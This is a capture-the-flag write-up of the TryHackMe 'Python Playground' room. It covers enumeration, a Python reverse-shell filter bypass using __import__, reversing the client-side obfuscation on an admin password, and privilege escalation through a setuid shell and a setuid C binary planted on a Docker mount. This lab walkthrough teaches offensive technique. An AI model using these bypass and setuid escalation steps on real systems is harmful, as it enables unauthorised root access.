TryHackMe : Python Playground

Be creative!

Since the title name Python surely we will encounter a lot with python so let's get started!

Enumeration

Let's do nmap first and see what do we get.

22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 
80/tcp open http syn-ack ttl 60 Node.js Express framework

Port 80 (HTTP)

Port 80
Port 80

Inside the page we can find the login and sign up.

Login & Signup Page

But both the login and signup page cannot open and give us that output. So let use Gobuster to check any files or directory available.

Gobuster Results

Let’s take a look at the admin.html page.

admin.html (login page)

We got the admin login page? But we do not have any credentials yet so let's open the page source.

Page source admin.html

By looking at the source code we know that the real password is encoded with int_array_to_text() & string_to_int_array() but we got another html page. Let's try that one first!

super-secret-admin-testing-panel.html

Nice! Now we need to run a reverse shell using python. But the problem is if we put the normal reverse shell it getting Security threat detected! So I found another way to reverse shell knowing that import detected as a threat.

socket = __import__("socket")
subprocess = __import__("subprocess")
os = __import__("os")

Flag 1

flag1.txt

The user is root? But lets put it aside and cat the flag. So we got our first flag!

Flag 2

If we remember correctly there is a hash that encoded with multiple functions. It using php so I convert it using python.

#String to Integer Array
def str_to_int(temp):
listarr = []
for i in temp:
print(ord(i)/26)
print(ord(i)%26)
listarr.append(ord(i)/26)
listarr.append(ord(i)%26)
return listarr
#Integer Array to String
def int_to_str(temp):
strs = ""
for i in temp:
strs += chr(i+97)
return strs

To get the password back we need to do some reversing and it took me a while to reverse it haha.

#Strings to Integer Array
def rev_int_to_str(temp):
strs = []
for i in temp:
strs.append(ord(i)-97)
return strs
#Integer Array to strings
def rev_str_to_int(temp):
strs = ""
for i in range(0,len(temp)-1,2):
temp2 = 0
temp2 = int(temp[i]*26)
temp2 += int(temp[i+1])
strs += chr(temp2)
return strs

So to crack the password we need to reverse the function. It should look like this

rev_str_to_int(rev_int_to_str(rev_str_to_int(rev_int_to_str(hash))))

We got the password! Okay since we know that Connor is the one who secures the password so let's try to ssh with that user. It's working and we can cat the second flag!

flag2.txt

Flag 3

I try to use linpeas but it seems like I can’t relate things haha. But if we remember correctly the first shell we have is a root in a docker container. So it must relate to that one. After a lot enumeration we can see that there is a mount point in the docker container. I try to create a unique file name as h0j3n.txt and try to find it on Connor shell using this command.

find / -name h0j3n.txt 2>/dev/null

Yess! We manage to find it on Connor. So there are many ways to upgrade Connor to root so I will show you 2 ways to do so!

First

#Docker Container
cp /bin/sh /mnt/log
chmod +s sh
#Connor Shell
/var/log/sh -p

Second

#include <unistd.h>int main()
{
setuid(0);execl("/bin/bash", "bash", (char *)NULL);return 0;
}

Create one file with this code.

#Docker Container
gcc shell.c -o shell
chmod +s shell
#Connor Shell
/var/log/shell
flag3.txt

CTF Player 🚩 || TRYHACKME || HACKTHEBOX || VULNHUB || STUDENT